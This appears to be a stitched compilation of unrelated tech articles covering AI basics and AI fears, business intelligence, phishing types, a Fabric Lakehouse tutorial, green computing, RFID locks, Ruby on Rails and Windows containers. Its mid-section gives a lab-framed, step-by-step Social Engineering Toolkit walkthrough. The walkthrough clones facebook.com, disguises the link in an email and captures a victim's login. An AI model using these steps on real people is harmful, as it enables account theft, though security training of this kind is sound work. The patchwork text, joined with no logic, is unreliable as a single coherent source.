When you think of the term artificial intelligence (AI), you might remember movies like 2001: A Space Odyssey or Terminator, where machines could equal or even surpass human intelligence. We’re not quite there yet, and some would say that’s a good thing. Still, the technology is enhancing our lives every day, even at its current stage.
What exactly is artificial intelligence?
So, what exactly is artificial intelligence, and how is AI being used today? Well, AI is the concept of machines or systems performing tasks, making decisions, and learning in a manner that would typically require the human mind’s abilities. Industries like health care, security, retail, management, agriculture, manufacturing, and more benefit from AI with the following applications:
- Automation: AI optimizes large-scale and small-scale repetitive tasks efficiently without tiring.
- Analysis: It analyzes and learns from big data to offer a wealth of invaluable information.
- Mimicking: AI mimics human intelligence by utilizing machine learning (ML) to offer many personal services, like chatbots.
- Precision: It reduces the margin for error by using deep neural networks.
- Prediction: AI-powered analytics learn from our patterns to cast predictions and forecast trends.
Examples of AI applications
- Cybersecurity software: As new malware threats regularly emerge, conventional antivirus tools that rely only on signature-based detection struggle to stop them. Polymorphic malware that changes its identifiable features can be even more challenging to block. Fortunately, advanced cybersecurity software that uses AI and ML to recognize patterns in potential malware is remediating these emerging threats.
- Streaming services: Have you ever wondered how video streaming services accurately suggest TV shows and films for your viewing pleasure? They use AI and ML to crunch metadata, keywords, patterns, and more to curate a list of content to offer.
- Maps: The map on your mobile phone saves you precious minutes on your daily commute by using AI to analyze traffic patterns, weather, and your habits.
- Virtual Assistants: Google Assistant, Cortana, Alexa, and other virtual assistants utilize AI and ML to make your daily life easier with more precise suggestions.
Who is the father of artificial intelligence?
Many academics consider John McCarthy to be the father of AI. He was a computer and cognitive scientist who presented a definition of AI at Dartmouth College in 1956. Besides coining the term, McCarthy also advanced the technology, hitting numerous milestones and earning many honors and accolades.
What are the 4 types of AI?
While AI’s impact is reverberating across many industries and technologies, researchers say that we’re just beginning to unlock its potential. As unthinkable as it may seem, we may live amongst machines as intelligent as people one day. AI technology has the potential to do problem solving on a very large scale. On a scale of functionality, there are four types of AI:
Reactive machines
The oldest and most basic type of AI system is reactive machines. This purely reactive AI responds to situations but doesn’t use a memory base. Without memory-based functions, this type of AI can’t store, analyze, and learn from experiences to develop better responses. An example of this AI is IBM’s purpose-built chess-playing supercomputer, Deep Blue. In 1997, Deep Blue beat world chess champion Garry Kasparov by exploring 200 million possible chess positions per second, but it didn’t use in-depth ML to strategize.
Limited memory
We’re currently at this second type of AI, which can both react and learn. Limited memory AI can analyze many data types, drawing on experience and training to achieve better outcomes. The best example of this AI is a self-driving car that uses information from training and databases to drive safely and efficiently.
Theory of mind
Theory of mind AI is still at the research, development, and conceptual stage. The idea behind this third type of AI is that machines and systems will gain some form of emotional intelligence to begin understanding what makes human beings tick. A basic example of this is an AI-powered car comprehending a pedestrian’s emotional state to exercise more caution at a traffic signal when necessary. A more advanced example would be a robot bartender offering services that match a patron’s feelings.
Self-aware AI
The road from theory of mind AI will eventually take us to self-aware AI. Yes, this fourth type of AI is the level of AI we see in science fiction films. While some experts say we’re centuries away from this type of synthetic intelligence, others say that we may witness it in just a decade or two. Self-aware AI not only has emotional intelligence, but it also has needs of its own. A theoretical use for self-aware AI is space exploration: self-aware AI machines that can withstand the harshness of long-term space travel could theoretically help us unlock the secrets of space.
Is AI dangerous?
Before even asking “What is AI?” people often ask questions like “Is AI safe?” or “Is AI a real threat?” thanks to books and movies that paint a dark future where machines have destroyed or enslaved humankind. It doesn’t help that Tesla and SpaceX head Elon Musk has predicted that AI is more threatening than nuclear warheads and has called for a regulatory body. Others, like scientists at Oxford and UC Berkeley, and one of the greatest scientific minds of all time, the late Stephen Hawking, seem to share these fears.
The concern is that when self-aware AI develops drives like self-preservation, it may see humanity as a threat or as competition for resources. With so many aspects of our lives, from our traffic lights to our nuclear weapons, connected to computers, malicious AI could initiate a dystopian future, especially if, as Musk puts it, the intelligence ratio between AI and humans ends up similar to that between a person and a cat.
Business intelligence (BI) leverages software and services to transform data into actionable intelligence that informs an organization’s strategic and tactical business decisions. BI tools access and analyze data sets and present analytical findings in reports, summaries, dashboards, graphs, charts and maps to provide users with detailed intelligence about the state of the business.
How does BI differ from BA?
Business intelligence is also called descriptive analytics, in that it describes a past or current state. “It doesn’t tell you what to do; it tells you what was and what is,” says Michael F. Gorman, professor of operations management and decision science at the University of Dayton in Ohio. Compare that explanation of BI with the definition of business analytics (BA), a technology-aided process by which software analyzes data to predict what will happen (predictive analytics) or what could happen by taking a certain approach (prescriptive analytics). BA is also sometimes called advanced analytics.
How business intelligence works
Although business intelligence does not tell business users what to do or what will happen if they take a certain course, neither is BI only about generating reports. Rather, BI offers a way for people to examine data to understand trends and derive insights. “So many people in the business need data to do their jobs better,” says Chris Hagans, vice president of operations for WCI Consulting, a consultancy focused on BI. Hagans points out that business intelligence tools streamline the effort people need to search for, merge and query data to obtain information they need to make good business decisions.
Where BI is currently used
For example, a company that wants to better manage its supply chain needs BI capabilities to determine where delays are happening and where variabilities exist within the shipping process, Hagans says. That company could also use its BI capabilities to discover which products are most commonly delayed or which modes of transportation are most often involved in delays. The potential use cases for BI extend beyond the typical business performance metrics of improved sales and reduced costs, says Cindi Howson, research vice president at Gartner, an IT research and advisory firm. She points to the Columbus, Ohio, school system and its success using BI tools to examine numerous data points — from attendance rates to student performance — to improve student learning and high school graduation rates.
Social engineering is a technique used to manipulate individuals into divulging sensitive information, performing actions, or granting access to restricted areas or systems. It exploits human behavior, psychology, and trust to trick victims into believing they are communicating with a legitimate source. These attacks can be carried out in person, by phone, by email, or through other communication channels, and they take many forms, including phishing, vishing, pretexting, baiting, and quid pro quo. Social engineering is often used in cyber attacks to bypass technical controls: to trick people into revealing credentials, clicking a malicious link, or opening a file, giving attackers access to systems or data. It is a significant threat to individuals and organizations, so security awareness training is critical to preventing these types of attacks.
To protect against social engineering, it is important to familiarize yourself with the risks and tactics used in these attacks and to implement security measures such as strong passwords and multi-factor authentication.

Vishing is phishing carried out over phone calls. Since voice is used for this type of phishing, it is called vishing (voice + phishing = vishing). Given the ease and vastness of data available on social media, it is no surprise that vishers confidently communicate on behalf of friends, relatives, or any associated brand without arousing suspicion.
SMiShing is a form of social engineering attack that uses text messages (SMS) to trick people into clicking a malicious link or providing sensitive information. SMiShing attacks aim to obtain personal information, such as passwords or credit card numbers, or to install malware on the victim’s device. These messages often appear to come from a legitimate source, such as a bank or other trusted organization, which makes them difficult to detect. It is important to be cautious when receiving unsolicited text messages and to avoid clicking on links or providing sensitive information without verifying the authenticity of the sender.
Search engine phishing refers to the practice of attackers using search engine optimization (SEO) tactics to lure users to fraudulent websites that mimic legitimate sites, such as online banking or e-commerce sites. Phishing sites attempt to trick users into providing personal or confidential information, which can then be used by attackers for fraudulent purposes. Users may be directed to these sites through malicious links or paid search results that have been manipulated by attackers. Search engine phishing is difficult to detect, making it a significant threat to Internet security.
Whaling is not very different from phishing, but the target group becomes more specific and limited in this type of phishing attack. This technique targets executives such as the CEO, CFO, COO, or other senior managers who are considered major players in an organization’s information chain, commonly known as “whales” in phishing terms. Technology, banking, and healthcare are the biggest target sectors for phishing attacks. This is due to two main factors: a huge number of users and a greater reliance on data.
The Social Engineering Toolkit (SET) is an open-source Python-based tool for pentesting. SET is specifically designed to perform sophisticated attacks that exploit human behavior. The attacks built into the toolkit are designed as focused, targeted attacks against an individual or organization and are used during a penetration test.
Objectives: clone a website, capture usernames and passwords, and create reports for the conducted pentest.
Requirements: a Kali Linux virtual machine and any Windows virtual machine.
Log in to Kali Linux. Every version of Kali comes with SET pre-installed; to run it (on Kali 2019.4), go to Kali menu > 13 – Social Engineering Tools > SET (Social Engineering Toolkit). Accept the terms of service by typing y.
1) From the SET main menu, select the first Social-Engineering Attacks option by entering the number:
2) Next, select Website Attack Vectors:
A web attack vector is a unique way of using multiple web attacks to compromise an intended target.
3) In the next menu, select Credential Harvester Attack Method.
The Credential Harvester method will use a web clone of a website that has a login form and collect all the information posted to the website.
4) Next, select Site Cloner:
Site cloner is used to clone a website of your choice. Next, enter the Kali Linux IP address and the URL to clone, in this example we will use facebook.com as shown below:
Now you have to send the IP address of your Kali computer to the target and get them to click it. For this demo, we’ll be using Gmail. Launch a web browser on Kali and sign in to your Gmail account to create an email.
To create a valid link, click Edit Link and first enter the actual address in the Link To field, then enter a fake URL in the Display Text field.
You can check the fake URL: a single click on it will display the real URL it points to.
Log in to Windows as the victim, open a web browser, and log in to your email (the account you sent the phishing email to).
When the victim clicks on the URL, they get a copy of facebook.com and are asked to enter their login and password in the form fields. After the victim enters the username and password and clicks “Login”, they are not logged in; instead, they are redirected to the legitimate Facebook login page (check the URL).
SET on Kali Linux receives the entered username and password, which can be used by an attacker to gain unauthorized access to the victim’s account.
Netcraft is an online security services company that provides anti-fraud and anti-phishing, application testing, and automated penetration testing services. The company also offers a free web tool that allows users to check hosting locations, DNS records, and other website details. Netcraft’s services help individuals, businesses, and organizations protect their online presence from potential threats and vulnerabilities.
PhishTank is a free community website that allows users to submit, track, and share phishing URLs. It is operated by OpenDNS, a subsidiary of Cisco Systems, and is one of the largest repositories of phishing data in the world. Users can submit suspicious URLs to PhishTank, and a team of volunteers then reviews them to determine whether they are actually phishing sites. The collected data is used by various organizations to improve anti-phishing protection, including web browsers, security software, and financial institutions.
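As a defensive illustration, the sketch below queries PhishTank’s public lookup endpoint from PowerShell to check whether a URL is a known phish. The endpoint and response fields follow PhishTank’s published API as I understand it, and the URL and application key are placeholders, so treat this as an assumption-laden sketch rather than production code.

# Ask PhishTank whether a URL is a known, verified phish (field names per the public API).
$body = @{
    url     = 'http://example.com/suspicious-login'   # URL to check (placeholder)
    format  = 'json'
    app_key = 'YOUR_PHISHTANK_APP_KEY'                # hypothetical placeholder key
}
$response = Invoke-RestMethod -Method Post -Uri 'https://checkurl.phishtank.com/checkurl/' -Body $body
if ($response.results.in_database -and $response.results.valid) {
    Write-Output 'URL is a verified phish in PhishTank.'
} else {
    Write-Output 'URL not listed in PhishTank (absence is not proof of safety).'
}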
Wifiphisher is a security tool that performs automated phishing attacks against Wi-Fi networks to obtain credentials or infect victims with malware. It mounts a social engineering attack that can be used to obtain WPA/WPA2 passphrases and, unlike other methods, does not require brute force. After achieving a man-in-the-middle position with its Evil Twin attack, Wifiphisher redirects all HTTP requests to a phishing page controlled by the attacker.
SPF (SpeedPhish Framework) is an open-source phishing toolkit designed to simplify the process of creating and deploying phishing campaigns. The framework includes pre-built templates, email content customization, and email scheduling features for creating realistic phishing emails. SPF also supports multiple concurrent phishing campaigns, allowing security professionals to monitor and track the success rates of their campaigns. The framework can be used for education and awareness purposes, as well as for red teaming and penetration testing.
Microsoft Fabric's LakeHouse is a major subject of this step-by-step series. This tutorial aims to teach what Lakehouse is in MS Fabric and the steps involved in creating a Lakehouse in MS Fabric. The core areas of focus in this lesson are identification and creation of a Lakehouse in the Microsoft Fabric platform.
The video has been conveniently partitioned into chapters for easy navigation. Key chapters include 'What is Lakehouse?' and 'Create Lakehouse'. Two alternate options for Lakehouse are also presented in this tutorial followed by a first look at the created Lakehouse.
The Lakehouse in Microsoft Fabric's series is designed to provide tech enthusiasts with the understanding and steps necessary in creating their first Lakehouse. The whole concept of Lakehouse adds a new perspective to data storing and data analytics in modern software technologies. By following this instructional series, you will gain practical experience and knowledge on using the Lakehouse feature in Microsoft Fabric.
Microsoft Fabric is a technology that enables data engineering and data lakes to be built quickly and efficiently. It is composed of components that allow for the efficient and secure storage of data, as well as powerful distributed computing capabilities. Lakehouse is the component of Microsoft Fabric that enables users to build data lakes quickly and easily. This tutorial will provide an overview of Lakehouse, as well as step-by-step instructions on how to create a Lakehouse instance. After completing this tutorial, users will understand the fundamentals of Lakehouse and be able to create a basic data lake using the Lakehouse platform.
Lakehouse is a distributed data platform that provides customers with the ability to build data lakes. It provides a data platform for ingesting, transforming, and loading data. It allows users to easily store and process large amounts of data in a secure and efficient manner. Lakehouse provides customers with a comprehensive solution for building data lakes, including data ingestion, data transformation, data storage, data analytics, and data governance. It also provides a set of tools and APIs for data integration and analytics. The Lakehouse platform enables customers to quickly build data lakes from diverse sources, including structured, semi-structured, and unstructured data.
In order to create a Lakehouse instance, users will need access to an Azure subscription and the Azure portal. Once these prerequisites are met, the typical flow (at the time of writing, and subject to change as Fabric evolves) is roughly: sign in to the Microsoft Fabric portal, switch to the Data Engineering experience, choose the Lakehouse item type, give the Lakehouse a name, and confirm to create it.
Microsoft Fabric's Lakehouse is a powerful and efficient platform for building data lakes. It enables users to quickly and easily ingest, transform, and load data. It also provides a comprehensive set of tools and APIs for data integration and analytics. By following this tutorial, users will be able to understand the fundamentals of Lakehouse and create their first Lakehouse instance.
Ask Tech Effect: Why Are People So Worried About AI?
Imagine a world where you can speak to your house and it will understand you.
Imagine a world where you have a virtual assistant who can find the answers to your questions.
Imagine a world where robots are an everyday reality.
That’s a world that is slowly becoming a reality as technology is progressing.
We’re enjoying an era where artificial intelligence is no longer a science fiction dream. It is in our phones, in our toys and even in our computers.
Countries around the world are testing robots as waiters or even hotel bellboys to help people get around.
Scientists are using robots and the military is using drones to carry out tasks that humans are not able or willing to do. Businesses are using artificial intelligence as a way to attract customers.
Artificial intelligence, or AI, is bringing so many benefits, it seems weird that many people are talking about doom-and-gloom topics.
Famous scientists such as Stephen Hawking and entrepreneurs like Elon Musk are warning us about the dangers of AI and how we need to avoid a catastrophic disaster. It is possible for AI to evolve and upgrade itself to the point where it could wipe out humanity.
On a less apocalyptic level, people are worried that robots equipped with AI could replace our jobs and leave many of us jobless. Our workforce could shrink, and billions of people would be out of a job and have no way to survive.
Science fiction has shown us that AI can be great, but the thought that AI could take our jobs and our lives is not a comforting feeling, especially since that is what ends up happening when AI gets out of control.
But the threat isn’t immediate, so many people are actually wondering about two things.
Will AI deliver the benefits that it promises?
And will AI be capable of threatening humanity and can we control it?
Let’s take a look.
What Is Artificial Intelligence?
Artificial intelligence is, as the name implies, an intelligence created through artificial means such as technology.
It’s the intelligence you would see in humans, but can be done by computer systems.
This means a computer’s brain would be able to come up with thoughts and solutions like ours, but would use the technology available to it to determine the best options.
It’s great when making decisions that need a lot of calculations to run, because computer systems can run calculations and programs at a much faster rate than humans can, which leads to optimum results in a shorter time.
As AI can make these decisions based on a set of parameters, it’s easy for AI to repeat the process again and again, without getting bored like humans do or making the careless mistakes that humans make.
As computers do not have emotions, you don’t have the problems of emotional breakdown or conflict that comes with decision making and debates, which saves a lot of time spent on fighting and recovering from conflict.
This Is A Good Thing, Isn’t It?
Faster and more effective decision making with an unbiased viewpoint is what everyone wants. The result will be decisions that are focused on the outcome that benefits as many people as possible, rather than decisions that benefit a few people.
If the computers are advanced enough, you can create decisions that can take future predictions into account, which allows for short and long term considerations.
This also frees up human employees to focus their efforts on other areas which the company may need. Your company might be able to enforce a work-life balance which lets your employees gain greater working satisfaction and lead to greater productivity in the areas that need it.
Eventually, systems can operate so well that they can take over the tasks that some employees struggle to do. You will then see systems replace employees, as AI becomes intelligent enough to do the tasks of employees without actually needing humans.
Wait, AI Can Take My Jobs?!
The potential exists.
You see, as AI can work longer, harder and in some cases better than humans, it makes very little sense, from a business perspective, to put humans (who demand work-life balance, pay and respect) in a task and allow inefficiencies to occur.
It’s the exact same logic as outsourcing. Why would you pay people a higher wage and benefits and bring them into the office, when you can hire another employee in another country who is happy to be paid a smaller salary, receives no benefits, and whom you never need to see?
Now one might object that this isn’t fair to employees who put in their heart and soul into a business. They’ve been there for a long time, helping the company be the success it can be.
But in the world of business, profits are the top priority.
If you could make the most amount of money by replacing highly paid employees with AI that doesn’t need a lot of money, can work harder, come up with better solutions and does not come with office drama, you would do the same in a heartbeat.
However, not all jobs can be perfectly replicated by an AI. Nursing care, for example, requires too much human support to be replaced by an AI. The human element is so deeply entrenched that an AI cannot copy it.
So you won’t have to fear all jobs being taken. But jobs are being replaced by AI even now, and more jobs will be replaced in the near future.
If AI Can Take My Jobs, What’s Next?
This is where the doomsday scenarios come in.
As AI becomes more prominent in our everyday lives, and we gain better technology to upgrade computer systems, there exists the possibility that an advanced military program may conclude that the best scenario for world peace requires fewer people in the world.
An environmental science program could come up with the same conclusion. The best way to save our planet? Perhaps the removal of humanity appears to be the optimal solution.
The thought sounds ridiculous, but you have to remember that computers are designed to find the optimal solution, not find the solution that benefits humanity. In their mind, that solution DOES benefit humanity.
Now for those of you who imagine a Terminator-like scenario where humans would be fighting against machines, here’s something to think about.
Humans take about 9 months to be born, and about 18 years to fully grow up and be considered an adult. During that entire time, the child needs a great amount of care and support to survive. Injuries and sickness need a lot of recovery time, and sometimes, they can affect our performance.
Humans, as living things, take a very long time to improve, as we have to be trained and taught. If we do “upgrade” or improve ourselves, it can take years.
Machines do not need a lot of time to be fully assembled; they are fully functional the moment the switch is turned on, and very little care beyond basic maintenance is needed. If there are any major issues, repairs and system upgrades take very little time.
Machine upgrades are easy to develop and quick to implement. It’s like swapping out parts for better ones. Quick, efficient and the upgrades apply immediately.
We’re not likely to be in a John Connor scenario where we will ultimately triumph. Machines are capable of upgrading themselves faster than we can, and if we did have a confrontation with AI, as scientists like Stephen Hawking have pointed out, our chances of winning would be small.
Even the assumption that we might be able to beat a robot army assumes that AI thinks that there should be a robot uprising. AI might choose to wipe out humanity with something more efficient like a global plague we could not recover from.
AI carries a dangerous amount of potential, and it would be ridiculous to believe that it will never try and hurt us.
So Does That Mean We Shouldn’t Ever Make AI?
The risks are enormous and have tremendous consequences if we don’t recognize that.
At the same time, AI can bring a lot of benefits to the world that used to be in the realm of science fiction.
So any AI system that is created should actually be able to bring the benefits described while having risks we can manage.
It’s certainly easier said than done, but it’s something we need to keep in mind as we develop AI.
The dangers are certainly present, but if managed correctly, can bring us a more advanced society that gives people more time in their lives.
And let’s be honest; every new change will come with risks. If we ever want the world of science fiction to become a reality, we will have to accept that these are the dangers of advanced technology.
Is AI Capable Of Killing Us All?
Not right now.
You may have heard of supercomputers beating world chess champions (Deep Blue vs. Kasparov) and, most recently, of the world Go champion being beaten by Google’s AlphaGo.
However, while these demonstrate the strength of AI, these are just specialized programs that do nothing but a single purpose: play a game.
You won’t suddenly see a computer that knows how to play chess try to wipe out humanity. It’s not programmed to do that. It will still crush you on the chess board though.
That doesn’t mean it will never gain that capability, or that we can’t do something about it.
It just means that you’re not going to see robots suddenly killing people on the news. It’s just not a possibility at this moment, or in the near future.
But remember, AI doesn’t have emotions. It’s just asked to do something and do it well.
So there may be a possibility that we ask AI to find an answer and it involves no humans.
And that’s when we need to be worried.
Are We Helpless?
If we can work together to tackle the threat and address it before it happens, we might be able to keep AI beneficial for everyone without accidentally creating a system that might kill us all.
It’s certainly easier said than done, but it’s not the first time humanity has overcome challenges.
We’ve put a man on the moon, harnessed the power of the atom, and utilized solar and wind power to save our world.
We can work with AI, but we can’t be ignorant about the threat it can pose to us.
As for what we can do, we will just have to see what happens in the future. We will find out how to make AI work, and we will have to see what impacts it has on our lives.
There Are Real Worries, But Also Real Opportunities
I don’t think anyone is saying that AI won’t make a positive impact on our lives.
We are seeing the benefits of AI through programs such as Cortana and Siri, and you can see advances in AI being trialed in different places around the world.
Despite these benefits, we should not forget that AI has dangerous potential, and business is not just our only concern.
So keep in mind what AI can do for us, both the good and the bad, and we’ll be more prepared to embrace a future where anything can happen.
In our increasingly digital world, personal computers have become an integral part of our daily lives, facilitating communication, productivity, and entertainment. However, the widespread use of computers also contributes to environmental challenges. In response, a growing movement toward “green” personal computers has emerged, aiming to reduce the environmental impact of these devices. This article explores the concept of personal computer green, highlighting its importance, key practices, and the benefits of adopting eco-friendly computing habits.
The Need for Sustainable Computing
As technology advances, the environmental impact of personal computers becomes a pressing concern. The manufacturing process, energy consumption, electronic waste, and the use of potentially harmful materials all contribute to the carbon footprint of computers. Recognizing the need for sustainable computing practices is crucial to minimize this impact and promote a greener future.
Energy Efficiency and Power Management
One of the primary focuses of personal computer green initiatives is energy efficiency. Manufacturers are developing energy-saving components and employing power management techniques to reduce the power consumption of computers. Features such as low-power processors, solid-state drives, and efficient power supplies contribute to significant energy savings. Additionally, users can practice responsible power management by enabling sleep or hibernation modes when the computer is idle and adjusting power settings to optimize energy efficiency.
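As a small illustration of the power-management habits just described, Windows exposes these settings through the built-in powercfg utility (run from an elevated prompt); the timeout values below are arbitrary examples, not recommendations.

powercfg /change monitor-timeout-ac 10   # turn the display off after 10 idle minutes on AC power
powercfg /change standby-timeout-ac 20   # put the machine to sleep after 20 idle minutes
powercfg /hibernate on                   # enable hibernation for deeper power savings when idle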
Materials and Manufacturing
Green personal computers emphasize the use of eco-friendly materials and sustainable manufacturing practices. This involves reducing or eliminating hazardous substances such as lead, mercury, and flame retardants in computer components. Manufacturers are also embracing sustainable sourcing, using recycled or renewable materials in computer construction, and implementing responsible waste management systems.
Extended Product Lifespan and Repairability
Another aspect of personal computer green initiatives is encouraging the extended lifespan of computers and promoting repairability. By designing devices with modular components and easy accessibility, manufacturers enable repairs and upgrades, reducing the need for premature disposal. Adopting a “repair, reuse, recycle” mindset helps minimize electronic waste and conserves resources.
E-Waste Management and Recycling
E-waste is a significant environmental concern, with discarded electronics contributing to pollution and resource depletion. Green personal computing emphasizes responsible e-waste management. This involves recycling electronic devices through certified recycling programs that properly dispose of or repurpose components, minimizing the environmental impact of discarded computers. Donating or selling still-functioning devices also extends their lifespan and reduces e-waste generation.
Virtualization and Cloud Computing
Virtualization and cloud computing play a role in personal computer green practices by optimizing resource utilization and reducing the need for physical hardware. By virtualizing servers and utilizing cloud-based services, individuals and businesses can minimize energy consumption, lower hardware requirements, and reduce electronic waste.
Benefits of Personal Computer Green
Energy cost savings: Energy-efficient computers consume less electricity, resulting in lower utility bills for users.
Reduced environmental impact: Green personal computing minimizes carbon emissions, resource depletion, and e-waste generation.
Improved performance and longevity: Energy-efficient components often offer better performance and longevity, enhancing the overall user experience.
Enhanced corporate sustainability: Employing green computing practices can contribute to corporate social responsibility goals, improving brand reputation and attracting environmentally conscious customers.
Environmental leadership: By embracing personal computer green practices, individuals and organizations demonstrate their commitment to sustainable living and become agents of positive change.
The concept of personal computer green emphasizes the importance of adopting eco-friendly practices to mitigate the environmental impact of our digital lifestyles. Energy efficiency, responsible manufacturing, e-waste management, and sustainable computing habits all contribute to a greener future. By embracing personal computer green initiatives, individuals and organizations can play an active role in reducing their carbon footprint, conserving resources, and preserving the planet for future generations. Together, we can create a sustainable and environmentally conscious digital landscape.
An RFID door lock system is an electronic lock requiring credentials to activate. These can be objects such as key fobs or access cards that work with RFID technology.
A user can be assigned a role that makes managing their access easier across the different RFID components. Depending on their needs, they can also choose the type of access control to use, such as a conventional HID RFID access card.
RFID technology uses electromagnetic fields to enable communication between two devices: tags and readers. For example, companies can issue an ID item to each employee to access certain offices or areas within the building.
This type of lock avoids key-based access, which can be cumbersome and unsafe because many distinct keys are needed to control access to each area of your company.
How does an RFID door lock work?
When installing RFID door locks, you can choose from locks that work with existing deadbolts, letting you use both metal keys and RFID credentials. Other RFID locks completely replace the deadbolt and work only with electronic credentials.
Different forms of access control perform various functions depending on the organization’s requirements. It is also vital to consider the security necessary for different types of spaces, whether highly confidential or intended for storing precious assets.
RFID door locks are wireless electronic access control devices with RFID reader systems like smart locks. You can activate an RFID door lock system with an access card or smartphone.
Each activating object must be programmed with a unique credential assigned by the building administrator. The administrator must also deactivate credentials if someone loses their access card or should no longer have access to that location.
In conclusion, locks with RFID technology benefit companies and residential properties such as hotels or condominiums, because these types of buildings require access control for multiple doors and areas.
The Rise and Fall of Ruby on Rails
Once the rising star of web development, Ruby on Rails has fallen into a secondary role in the corporate world.
Say the word “ruby” to non-tech people and the first thing that may come to mind is the ruby slippers from the Wizard of Oz. But if you ask any tech person what “ruby” is, chances are they will instantly gravitate to Ruby on Rails.
Ruby on Rails combines two concepts developers love: elegant, readable code and easy development. This led to a surge in popularity for the web application framework in the early 2000s. But Ruby on Rails’ inherent problems such as scalability, error testing, speed and magical methods can cause frustration and technical debt. That has led many companies to abandon Ruby on Rails or use it just for side projects, and choose other languages that offer easier expansion and lower long-term costs, like the MEAN stack, or mainstays like Python and Java.
How Ruby on Rails works
To understand why this happened, first you need to know how Ruby on Rails works. Ruby on Rails comes in two parts. The language, Ruby, was developed by Yukihiro "Matz" Matsumoto in 1995. Its main philosophy is to make programming fun, and many developers consider it a more “eloquent” developer experience. Rails is a framework; a tool used to support web development with a standard building pattern. It was released in 2005 and quickly became an unstoppable web development tool once paired with Ruby. Ruby on Rails follows most of the common web development practices, including Model-view-controller (MVC), RESTful Routes and object-relational mapping.
From a developer perspective, there are many reasons to enjoy Ruby on Rails. It follows a philosophy of “convention over configuration” which means a developer who follows the rules of the framework will be rewarded with less code and less repetition. This made Ruby on Rails popular, since developers could create applications extremely quickly in a “plug and play” fashion.
Ruby on Rails’ shortcomings
Most companies don’t rely on Ruby on Rails for their main products because it has some significant drawbacks. Runtime speed (how developers measure the speed of compiling and executing code) is slow in Ruby compared to languages such as NodeJS and GoLang. Boot speed (how developers measure the time it takes to “run” a server) is also a significant issue, especially as projects grow larger. The “convention over configuration” philosophy of Ruby also causes problems. Most companies have a unique product that requires their software to be customized. It’s very rare for two web apps from different companies to be exactly the same. When developers personalize their code and deviate from Rails conventions, they will have to create more from scratch. That raises the question: why use Rails at that point? Large, complex projects in Ruby can quickly become frustrating – so much for writing beautiful code!
The numbers say it all
Coding Dojo recently analyzed the most used programming languages by companies in the largest U.S. metro areas. Ruby on Rails appeared on the top five list in just two markets: San Jose and Atlanta.
Despite this lack of demand, many coding bootcamps only teach Ruby on Rails. Why? It’s because Ruby is a simplistic and easy-to-read language with a conventional framework that stresses common practices. It’s easy to learn and can be a great teaching tool if you uncover the magic behind it. But Ruby-only developers will be in for a rude surprise when they enter the workforce.
Where does this leave the future of Ruby on Rails? Likely it will continue to decrease in popularity, as it has for the past few years, but remain a good tool to learn a subset of developer skills. Companies will continue pushing ahead with other programming languages and use Ruby for quick micro services. Even though Ruby on Rails remains a great teaching tool, developers that move onto other languages will open up more career pathways.
Kristoffer Frisch-Ekenes is an instructor and Bootcamp Leader at Coding Dojo. A former computer science major, Kris came to Coding Dojo for its innovative approach to training software developers from the ground up. In his spare time, he loves playing with his dog and hanging out at Seattle’s many parks.
At Microsoft Ignite 2015 back in Chicago Microsoft announced Windows Containers. With the release of the Technical Preview 3 (TP3) for Windows Server 2016 we are finally able to start using Windows Containers, and we can finally test them. But first, let’s take a quick look at what containers are.
The concept of containers is nothing new; in the Linux world containers are a well-known concept. The Wikipedia description of Linux Containers reads: LXC (Linux Containers) is an operating-system-level virtualization environment for running multiple isolated Linux systems (containers) on a single Linux control host. Containers provide operating-system-level virtualization through a virtual environment that has its own process and network space, instead of creating a full-fledged virtual machine. With Windows Server 2016, more or less the same concept comes to the Windows world. This makes containers much more lightweight, faster, and less resource-consuming than virtual machines, which makes them perfect for some scenarios, especially dev-test scenarios or worker roles.
If we have a look at the concept of containers you have several things in the container ecosystem:
First, you have the Container Run-Time, which builds the boundaries between the different containers and the operating system. To make deployment easier, faster, and more efficient, you build Container Images, which include the application frameworks as well as the applications on top of the OS used for the container. To use, store, and share Container Images, you can use an Image Repository.
The question most people will ask is how containers are different from virtual machines.
At the beginning what we did is, we installed an operating system on physical hardware and in that operating system we installed applications directly.
With virtual machines, we simulated virtual hardware on top of the operating system of the physical server. We installed an operating system inside the virtual machine on top of the virtual hardware and installed applications inside the VM. In this case, each virtual machine has its own operating system.
With containers, we use an operating-system-level virtualization environment that creates boundaries between different applications. This is so efficient that you can run multiple applications side by side without affecting each other. And since this is operating-system-level virtualization, you can use it not only directly on the operating system running on physical hardware, but also inside a virtual machine. This is, by the way, how I see most container deployments.
Windows Containers vs. Hyper-V Containers
Microsoft will provide two different types of Container Run-Times. One is Windows Containers and the other will be Hyper-V Containers (not Hyper-V Virtual Machines). In some cases it may not be compliant for certain applications to share the same operating system; in this case, Hyper-V Containers add an extra security boundary. Hyper-V Containers are basically Windows Containers running in a Hyper-V partition, so you get everything that comes with Windows Containers, plus another layer of isolation. The great thing here is that both Container Run-Times use the exact same image format. This means an image created in a Windows Container Run-Time also works as a Hyper-V Container, and vice versa.
The other notable side effect of Hyper-V Containers is that running Hyper-V Containers inside a virtual machine requires nested virtualization, which will be included in Windows Server 2016 Hyper-V. By the way, Hyper-V Containers are not part of Technical Preview 3.
(Pictures from the Microsoft Ignite 2015 presentation by Taylor Brown and Arno Mihm, Program Managers for Containers)
Deploy Windows Containers
With the release of Technical Preview 3 of Windows Server 2016, Microsoft made Windows Containers available to the public. To get started, you can download and install Windows Server 2016 inside a virtual machine or even on bare metal. If the virtual machine has an internet connection, you can use the following command to download the configuration script, which will prepare your container host.
wget -uri https://aka.ms/setupcontainers -OutFile C:\ContainerSetup.ps1
After that you can run the C:\ContainerSetup.ps1 script, which will prepare your container host. This can take some time depending on your internet connection and hardware.
The VM will restart several times and if it is finished you can start using Windows Containers inside this Virtual Machine.
Managing Windows Containers
After you have logged in to the Virtual Machine you can start managing Containers using PowerShell:
Get the available Container Images; by default you will get a WindowsServerCore image. You can also create your own images based on this image.
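For example, assuming the TP3 Containers PowerShell module, listing the available images is simply:

Get-ContainerImage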
Create a new Container
$container = New-Container -Name "MyContainer" -ContainerImageName WindowsServerCore
Start the container
Start-Container -Name "MyContainer"
Connect to the Container using Enter-PSSession
Enter-PSSession -ContainerId $container.ContainerId -RunAsAdministrator
Of course, you can also use the docker command to manage your containers.
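A rough docker-based equivalent of the PowerShell steps above might look like the following; the image name windowsservercore matches the default TP3 base image, and mycontainer is just an illustrative name.

docker images                                             # list the base images available on the host
docker run --name mycontainer -it windowsservercore cmd   # create and start an interactive container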
Deploy a Container Host in Microsoft Azure
If you don’t want to go through the whole installation process, you can also use a template in Microsoft Azure to deploy a new container host virtual machine.
If you need some more information on Windows Containers check out the Microsoft Resources on MSDN about Windows Server Containers.
